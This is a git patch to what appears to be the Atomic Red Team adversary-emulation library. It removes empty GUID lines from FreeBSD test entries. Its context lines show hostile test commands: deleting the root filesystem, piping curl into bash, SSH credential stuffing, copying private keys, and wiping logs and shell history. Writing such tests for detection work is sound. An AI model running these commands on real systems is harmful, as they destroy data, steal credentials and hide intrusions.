From 3b8d0af30222caeb41f50f9d1f452542fef28e6b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?= Date: Fri, 9 Jun 2023 09:11:41 -0500 Subject: [PATCH] Remove auto_generated_guid lines from new entries Some other tiny modifications --- atomics/T1003.007/T1003.007.yaml | 1 - atomics/T1003.008/T1003.008.yaml | 1 - atomics/T1007/T1007.yaml | 1 - atomics/T1016/T1016.yaml | 1 - atomics/T1018/T1018.yaml | 1 - atomics/T1027/T1027.yaml | 1 - atomics/T1036.006/T1036.006.yaml | 1 - atomics/T1037.004/T1037.004.yaml | 1 - atomics/T1040/T1040.yaml | 3 --- atomics/T1046/T1046.yaml | 1 - atomics/T1048.003/T1048.003.yaml | 1 - atomics/T1053.002/T1053.002.yaml | 1 - atomics/T1053.003/T1053.003.yaml | 1 - atomics/T1056.001/T1056.001.yaml | 1 - atomics/T1059.004/T1059.004.yaml | 4 ---- atomics/T1070.002/T1070.002.yaml | 7 +------ atomics/T1070.003/T1070.003.yaml | 7 ------- atomics/T1070.004/T1070.004.yaml | 1 - atomics/T1074.001/T1074.001.yaml | 1 - atomics/T1078.003/T1078.003.yaml | 3 --- atomics/T1082/T1082.yaml | 2 -- atomics/T1087.001/T1087.001.yaml | 1 - atomics/T1090.003/T1090.003.yaml | 1 - atomics/T1110.001/T1110.001.yaml | 1 - atomics/T1110.004/T1110.004.yaml | 1 - atomics/T1113/T1113.yaml | 2 -- atomics/T1132.001/T1132.001.yaml | 1 - atomics/T1135/T1135.yaml | 1 - atomics/T1136.001/T1136.001.yaml | 2 -- atomics/T1140/T1140.yaml | 2 -- atomics/T1201/T1201.yaml | 1 - atomics/T1217/T1217.yaml | 1 - atomics/T1222.002/T1222.002.yaml | 3 --- atomics/T1497.001/T1497.001.yaml | 1 - atomics/T1518.001/T1518.001.yaml | 1 - atomics/T1529/T1529.yaml | 2 -- atomics/T1543.002/T1543.002.yaml | 1 - atomics/T1546.004/T1546.004.yaml | 1 - atomics/T1546.005/T1546.005.yaml | 2 -- atomics/T1548.001/T1548.001.yaml | 3 --- atomics/T1548.003/T1548.003.yaml | 3 --- atomics/T1552.003/T1552.003.yaml | 1 - atomics/T1552.004/T1552.004.yaml | 3 --- atomics/T1553.004/T1553.004.yaml | 1 - atomics/T1556.003/T1556.003.yaml | 1 - atomics/T1562.001/T1562.001.yaml | 1 - atomics/T1562.003/T1562.003.yaml | 3 --- atomics/T1562.004/T1562.004.yaml | 2 -- atomics/T1562.006/T1562.006.yaml | 2 -- 49 files changed, 1 insertion(+), 85 deletions(-) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index ea2dc013..51ab58d2 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -49,7 +49,6 @@ atomic_tests: rm -f "#{output_file}" - name: Dump individual process memory with sh on FreeBSD (Local) - auto_generated_guid: description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml index 84ffb4f1..f5c06ca8 100644 --- a/atomics/T1003.008/T1003.008.yaml +++ b/atomics/T1003.008/T1003.008.yaml @@ -21,7 +21,6 @@ atomic_tests: name: bash elevation_required: true - name: Access /etc/master.passwd (Local) - auto_generated_guid: description: | /etc/master.passwd file is accessed in FreeBSD environments supported_platforms: diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 4ac8c24c..34ffdb8e 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -46,7 +46,6 @@ atomic_tests: systemctl --type=service name: bash - name: System Service Discovery - service - auto_generated_guid: description: | Enumerates system service using service supported_platforms: diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index 397fc2a4..106f8990 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -54,7 +54,6 @@ atomic_tests: if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; name: sh - name: System Network Configuration Discovery (freebsd) - auto_generated_guid: description: | Identify network configuration information. diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 9d919fbd..2f046541 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -283,7 +283,6 @@ atomic_tests: name: sh - name: Remote System Discovery - netstat - auto_generated_guid: description: | Use the netstat command to display the kernels routing tables. supported_platforms: diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index e51db13c..6effa3fc 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -34,7 +34,6 @@ atomic_tests: rm /tmp/art.sh name: sh - name: Decode base64 Data into Script - auto_generated_guid: description: | Creates a base64-encoded data file and decodes it into an executable shell script diff --git a/atomics/T1036.006/T1036.006.yaml b/atomics/T1036.006/T1036.006.yaml index 131a0a67..8799461d 100644 --- a/atomics/T1036.006/T1036.006.yaml +++ b/atomics/T1036.006/T1036.006.yaml @@ -34,7 +34,6 @@ atomic_tests: cleanup_command: rm -rf /tmp/atomic-test-T1036.006 - name: Space After Filename (FreeBSD) - auto_generated_guid: description: | Space after filename. supported_platforms: diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 53e89190..b93a5a12 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -54,7 +54,6 @@ atomic_tests: cleanup_command: | origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - name: rc.local (FreeBSD) - auto_generated_guid: description: | Modify rc.local diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 6d209a69..78b6c612 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -29,7 +29,6 @@ atomic_tests: name: bash elevation_required: true - name: Packet Capture FreeBSD using tshark or tcpdump - auto_generated_guid: description: | Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. @@ -248,7 +247,6 @@ atomic_tests: name: bash elevation_required: true - name: Packet Capture FreeBSD using /dev/bpfN with sudo - auto_generated_guid: description: | Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds. supported_platforms: @@ -282,7 +280,6 @@ atomic_tests: name: sh elevation_required: true - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo - auto_generated_guid: description: | Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds. supported_platforms: diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index f79a2dfd..2b42ff2e 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -69,7 +69,6 @@ atomic_tests: name: sh elevation_required: true - name: Port Scan Nmap for FreeBSD - auto_generated_guid: description: | Scan ports to check for listening ports with Nmap. diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index c816bc16..52e73474 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -219,7 +219,6 @@ atomic_tests: command: | if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi - name: Python3 http.server (freebsd) - auto_generated_guid: description: | An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable. supported_platforms: diff --git a/atomics/T1053.002/T1053.002.yaml b/atomics/T1053.002/T1053.002.yaml index 5b58cf0a..727f0722 100644 --- a/atomics/T1053.002/T1053.002.yaml +++ b/atomics/T1053.002/T1053.002.yaml @@ -55,7 +55,6 @@ atomic_tests: command: |- echo "#{at_command}" | at #{time_spec} - name: At - Schedule a job freebsd - auto_generated_guid: description: | This test submits a command to be run in the future by the `at` daemon. diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index db20530b..43551d31 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml @@ -55,7 +55,6 @@ atomic_tests: rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} - name: Cron - Add script to /etc/cron.d folder - auto_generated_guid: description: | This test adds a script to /etc/cron.d folder configured to execute on a schedule. supported_platforms: diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index f060580c..40406db9 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -88,7 +88,6 @@ atomic_tests: cleanup_command: | unset PROMPT_COMMAND - name: Logging sh history to syslog/messages - auto_generated_guid: description: | There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index b3067f67..c5c0b641 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -169,7 +169,6 @@ atomic_tests: echo -n "$ART" |base64 -d |/bin/bash unset ART - name: Obfuscated command line scripts (freebsd) - auto_generated_guid: description: | An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed. supported_platforms: @@ -206,7 +205,6 @@ atomic_tests: cleanup_command: | userdel art - name: Change login shell (freebsd) - auto_generated_guid: description: | An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. supported_platforms: @@ -243,7 +241,6 @@ atomic_tests: cleanup_command: | unset ART - name: Environment variable scripts (freebsd) - auto_generated_guid: description: | An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh supported_platforms: @@ -290,7 +287,6 @@ atomic_tests: rm /tmp/art.txt - name: Detecting pipe-to-shell (freebsd) - auto_generated_guid: description: | An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command. supported_platforms: diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 62aa9983..ecbd413d 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -15,7 +15,6 @@ atomic_tests: name: sh elevation_required: true - name: rm -rf - auto_generated_guid: description: | Delete messages and security logs supported_platforms: @@ -52,7 +51,6 @@ atomic_tests: name: sh elevation_required: true - name: Truncate system log files via truncate utility (freebsd) - auto_generated_guid: description: | This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content supported_platforms: @@ -77,7 +75,6 @@ atomic_tests: name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) - auto_generated_guid: description: | The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility supported_platforms: @@ -114,7 +111,6 @@ atomic_tests: name: sh elevation_required: true - name: Overwrite FreeBSD system log via echo utility - auto_generated_guid: description: | This test overwrites the contents of system log file with an empty string using echo utility supported_platforms: @@ -148,11 +144,10 @@ atomic_tests: name: sh elevation_required: true - name: Delete system log files via unlink utility (freebsd) - auto_generated_guid: description: | This test deletes the messages log file using unlink utility supported_platforms: - - macos + - freebsd executor: command: | unlink /var/log/messages diff --git a/atomics/T1070.003/T1070.003.yaml b/atomics/T1070.003/T1070.003.yaml index fd465424..e32209dc 100644 --- a/atomics/T1070.003/T1070.003.yaml +++ b/atomics/T1070.003/T1070.003.yaml @@ -13,7 +13,6 @@ atomic_tests: rm ~/.bash_history name: sh - name: Clear sh history (rm) - auto_generated_guid: description: | Clears sh history via rm supported_platforms: @@ -34,7 +33,6 @@ atomic_tests: echo "" > ~/.bash_history name: sh - name: Clear sh history (echo) - auto_generated_guid: description: | Clears sh history via echo supported_platforms: @@ -55,7 +53,6 @@ atomic_tests: cat /dev/null > ~/.bash_history name: sh - name: Clear sh history (cat dev/null) - auto_generated_guid: description: | Clears sh history via cat /dev/null supported_platforms: @@ -77,7 +74,6 @@ atomic_tests: ln -sf /dev/null ~/.bash_history name: sh - name: Clear sh history (ln dev/null) - auto_generated_guid: description: | Clears sh history via a symlink to /dev/null supported_platforms: @@ -97,7 +93,6 @@ atomic_tests: truncate -s0 ~/.bash_history name: sh - name: Clear sh history (truncate) - auto_generated_guid: description: | Clears sh history via truncate supported_platforms: @@ -120,7 +115,6 @@ atomic_tests: history -c name: sh - name: Clear history of a bunch of shells (freebsd) - auto_generated_guid: description: | Clears the history of a bunch of different shell types by setting the history size to zero supported_platforms: @@ -188,7 +182,6 @@ atomic_tests: name: sh - name: Disable sh History Logging with SSH -T (freebsd) - auto_generated_guid: description: | Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog supported_platforms: diff --git a/atomics/T1070.004/T1070.004.yaml b/atomics/T1070.004/T1070.004.yaml index 44f377c0..59e92647 100644 --- a/atomics/T1070.004/T1070.004.yaml +++ b/atomics/T1070.004/T1070.004.yaml @@ -178,7 +178,6 @@ atomic_tests: rm -rf / --no-preserve-root > /dev/null 2> /dev/null name: bash - name: Delete Filesystem - FreeBSD - auto_generated_guid: description: | This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. supported_platforms: diff --git a/atomics/T1074.001/T1074.001.yaml b/atomics/T1074.001/T1074.001.yaml index db12c8e3..d5a24d71 100644 --- a/atomics/T1074.001/T1074.001.yaml +++ b/atomics/T1074.001/T1074.001.yaml @@ -36,7 +36,6 @@ atomic_tests: curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} name: bash - name: Stage data from Discovery.sh (freebsd) - auto_generated_guid: description: | Utilize curl to download discovery.sh and execute a basic information gathering shell script supported_platforms: diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index ee141b12..7f6a2004 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -119,7 +119,6 @@ atomic_tests: cleanup_command: | userdel -r art - name: Create local account (FreeBSD) - auto_generated_guid: description: | An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user. supported_platforms: @@ -158,7 +157,6 @@ atomic_tests: cleanup_command: | userdel -r art - name: Reactivate a locked/expired account (FreeBSD) - auto_generated_guid: description: | A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. @@ -202,7 +200,6 @@ atomic_tests: cat /etc/passwd |grep nobody # -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin - name: Login as nobody (freebsd) - auto_generated_guid: description: | An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. supported_platforms: diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 08ec281d..c542540b 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -81,7 +81,6 @@ atomic_tests: sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" name: bash - name: FreeBSD VM Check via Kernel Modules - auto_generated_guid: description: | Identify virtual machine host kernel modules. supported_platforms: @@ -363,7 +362,6 @@ atomic_tests: grep vmw /proc/modules name: sh - name: FreeBSD List Kernel Modules - auto_generated_guid: description: | Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present. supported_platforms: diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index b99f1b18..973a2d62 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -110,7 +110,6 @@ atomic_tests: rm -f #{output_file} name: sh - name: Show if a user account has ever logged in remotely (freebsd) - auto_generated_guid: description: | Show if a user account has ever logged in remotely supported_platforms: diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 8c25c9bf..1b48754c 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml @@ -116,7 +116,6 @@ atomic_tests: killall tor > /dev/null 2>&1 name: sh - name: Tor Proxy Usage - FreeBSD - auto_generated_guid: description: | This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index e1b76f0e..7ab2ee4c 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -226,7 +226,6 @@ atomic_tests: userdel -fr art - name: SUDO Brute Force - FreeBSD - auto_generated_guid: description: | An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 78be3827..2cddf2fa 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -64,7 +64,6 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From FreeBSD - auto_generated_guid: description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index f7cc606b..0abd44c9 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -70,7 +70,6 @@ atomic_tests: rm #{output_file} name: bash - name: X Windows Capture (freebsd) - auto_generated_guid: description: | Use xwd command to collect a full desktop screenshot and review file with xwud supported_platforms: @@ -122,7 +121,6 @@ atomic_tests: rm #{output_file} name: bash - name: Capture Linux Desktop using Import Tool (freebsd) - auto_generated_guid: description: | Use import command from ImageMagick to collect a full desktop screenshot supported_platforms: diff --git a/atomics/T1132.001/T1132.001.yaml b/atomics/T1132.001/T1132.001.yaml index 711f109b..d5d8e760 100644 --- a/atomics/T1132.001/T1132.001.yaml +++ b/atomics/T1132.001/T1132.001.yaml @@ -23,7 +23,6 @@ atomic_tests: curl -XPOST #{base64_data}.#{destination_url} name: sh - name: Base64 Encoded data (freebsd) - auto_generated_guid: description: | Utilizing a common technique for posting base64 encoded data. supported_platforms: diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 428e6017..1059b696 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -47,7 +47,6 @@ atomic_tests: name: bash elevation_required: true - name: Network Share Discovery - FreeBSD - auto_generated_guid: description: | Network Share Discovery using smbstatus supported_platforms: diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index 85305104..f0194521 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -20,7 +20,6 @@ atomic_tests: name: bash elevation_required: true - name: Create a user account on a FreeBSD system - auto_generated_guid: description: | Create a user via pw supported_platforms: @@ -130,7 +129,6 @@ atomic_tests: name: bash elevation_required: true - name: Create a new user in FreeBSD with `root` GID. - auto_generated_guid: description: | Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. supported_platforms: diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index 81e60bc7..d2e46192 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -139,7 +139,6 @@ atomic_tests: echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" - name: Base64 decoding with shell utilities (freebsd) - auto_generated_guid: description: | Use common shell utilities to decode a base64-encoded text string and echo it to the console supported_platforms: @@ -166,7 +165,6 @@ atomic_tests: echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r - name: FreeBSD b64encode Shebang in CLI - auto_generated_guid: description: | Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. supported_platforms: diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 7fa2a09b..d790c8e9 100644 --- a/atomics/T1201/T1201.yaml +++ b/atomics/T1201/T1201.yaml @@ -12,7 +12,6 @@ atomic_tests: cat /etc/pam.d/common-password name: bash - name: Examine password complexity policy - FreeBSD - auto_generated_guid: description: | Lists the password complexity policy to console on FreeBSD. supported_platforms: diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml index 1f9941f6..44c55557 100644 --- a/atomics/T1217/T1217.yaml +++ b/atomics/T1217/T1217.yaml @@ -57,7 +57,6 @@ atomic_tests: rm -f #{output_file} 2>/dev/null name: sh - name: List Google Chromium Bookmark JSON Files on FreeBSD - auto_generated_guid: description: | Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file. supported_platforms: diff --git a/atomics/T1222.002/T1222.002.yaml b/atomics/T1222.002/T1222.002.yaml index d6322db1..13bc9143 100644 --- a/atomics/T1222.002/T1222.002.yaml +++ b/atomics/T1222.002/T1222.002.yaml @@ -192,7 +192,6 @@ atomic_tests: chattr -i #{file_to_modify} name: sh - name: chflags - Remove immutable file attribute - auto_generated_guid: description: | Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. @@ -238,7 +237,6 @@ atomic_tests: #{compiled_file} /tmp/ T1222002 name: sh - name: Chmod through c script (freebsd) - auto_generated_guid: description: | chmods a file using a c script supported_platforms: @@ -295,7 +293,6 @@ atomic_tests: name: sh elevation_required: true - name: Chown through c script (freebsd) - auto_generated_guid: description: | chowns a file to root using a c script supported_platforms: diff --git a/atomics/T1497.001/T1497.001.yaml b/atomics/T1497.001/T1497.001.yaml index 638e71a2..e2592c64 100644 --- a/atomics/T1497.001/T1497.001.yaml +++ b/atomics/T1497.001/T1497.001.yaml @@ -16,7 +16,6 @@ atomic_tests: if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; - name: Detect Virtualization Environment (FreeBSD) - auto_generated_guid: description: | Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml index e449c38a..1c9fefde 100644 --- a/atomics/T1518.001/T1518.001.yaml +++ b/atomics/T1518.001/T1518.001.yaml @@ -64,7 +64,6 @@ atomic_tests: ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd' name: sh - name: Security Software Discovery - pgrep (FreeBSD) - auto_generated_guid: description: | Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index 347f0ff6..e3e00fa9 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -95,7 +95,6 @@ atomic_tests: name: sh elevation_required: true - name: Reboot System via `halt` - FreeBSD - auto_generated_guid: description: | This test restarts a FreeBSD system using `halt`. supported_platforms: @@ -129,7 +128,6 @@ atomic_tests: name: sh elevation_required: true - name: Reboot System via `poweroff` - FreeBSD - auto_generated_guid: description: | This test restarts a FreeBSD system using `poweroff`. supported_platforms: diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index 88ca9f37..3c515f95 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -66,7 +66,6 @@ atomic_tests: systemctl daemon-reload name: bash - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c description: | This test creates a Systemd service unit file and enables it as a service. supported_platforms: diff --git a/atomics/T1546.004/T1546.004.yaml b/atomics/T1546.004/T1546.004.yaml index 8cf6b28f..4c5e4818 100644 --- a/atomics/T1546.004/T1546.004.yaml +++ b/atomics/T1546.004/T1546.004.yaml @@ -40,7 +40,6 @@ atomic_tests: mv /tmp/T1546.004 ~/.bashrc name: sh - name: Add command to .shrc - auto_generated_guid: description: | Adds a command to the .shrc file of the current user supported_platforms: diff --git a/atomics/T1546.005/T1546.005.yaml b/atomics/T1546.005/T1546.005.yaml index 9ab2d6c4..bd2c6a09 100644 --- a/atomics/T1546.005/T1546.005.yaml +++ b/atomics/T1546.005/T1546.005.yaml @@ -16,7 +16,6 @@ atomic_tests: rm -f /tmp/art-fish.txt name: sh - name: Trap EXIT (freebsd) - auto_generated_guid: description: | Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt @@ -51,7 +50,6 @@ atomic_tests: rm -f /tmp/art-fish.txt name: sh - name: Trap SIGINT (freebsd) - auto_generated_guid: description: | Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt diff --git a/atomics/T1548.001/T1548.001.yaml b/atomics/T1548.001/T1548.001.yaml index 610d14c2..ca39e7e6 100644 --- a/atomics/T1548.001/T1548.001.yaml +++ b/atomics/T1548.001/T1548.001.yaml @@ -27,7 +27,6 @@ atomic_tests: name: sh elevation_required: true - name: Make and modify binary from C source (freebsd) - auto_generated_guid: description: | Make, change owner, and change file attributes on a C source code file supported_platforms: @@ -72,7 +71,6 @@ atomic_tests: name: sh elevation_required: true - name: Set a SetUID flag on file (freebsd) - auto_generated_guid: description: | This test sets the SetUID flag on a file in FreeBSD. supported_platforms: @@ -113,7 +111,6 @@ atomic_tests: name: sh elevation_required: true - name: Set a SetGID flag on file (freebsd) - auto_generated_guid: description: | This test sets the SetGID flag on a file in FreeBSD. supported_platforms: diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml index 49ff0c29..c7288ea0 100644 --- a/atomics/T1548.003/T1548.003.yaml +++ b/atomics/T1548.003/T1548.003.yaml @@ -21,7 +21,6 @@ atomic_tests: sudo vim /etc/sudoers - name: Sudo usage (freebsd) - auto_generated_guid: description: | Common Sudo enumeration methods. @@ -63,7 +62,6 @@ atomic_tests: sudo visudo -c -f /etc/sudoers - name: Unlimited sudo cache timeout (freebsd) - auto_generated_guid: description: | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. @@ -104,7 +102,6 @@ atomic_tests: sudo visudo -c -f /etc/sudoers - name: Disable tty_tickets for sudo caching (freebsd) - auto_generated_guid: description: | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. diff --git a/atomics/T1552.003/T1552.003.yaml b/atomics/T1552.003/T1552.003.yaml index aabac68c..39e33f67 100644 --- a/atomics/T1552.003/T1552.003.yaml +++ b/atomics/T1552.003/T1552.003.yaml @@ -26,7 +26,6 @@ atomic_tests: cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} name: sh - name: Search Through sh History - auto_generated_guid: description: | Search through sh history for specifice commands we want to capture supported_platforms: diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index 32dc7100..a8e9976a 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -61,7 +61,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy Private SSH Keys with CP (freebsd) - auto_generated_guid: description: | Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command. supported_platforms: @@ -113,7 +112,6 @@ atomic_tests: rm -rf #{output_folder} name: sh - name: Copy Private SSH Keys with rsync (freebsd) - auto_generated_guid: description: | Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command. 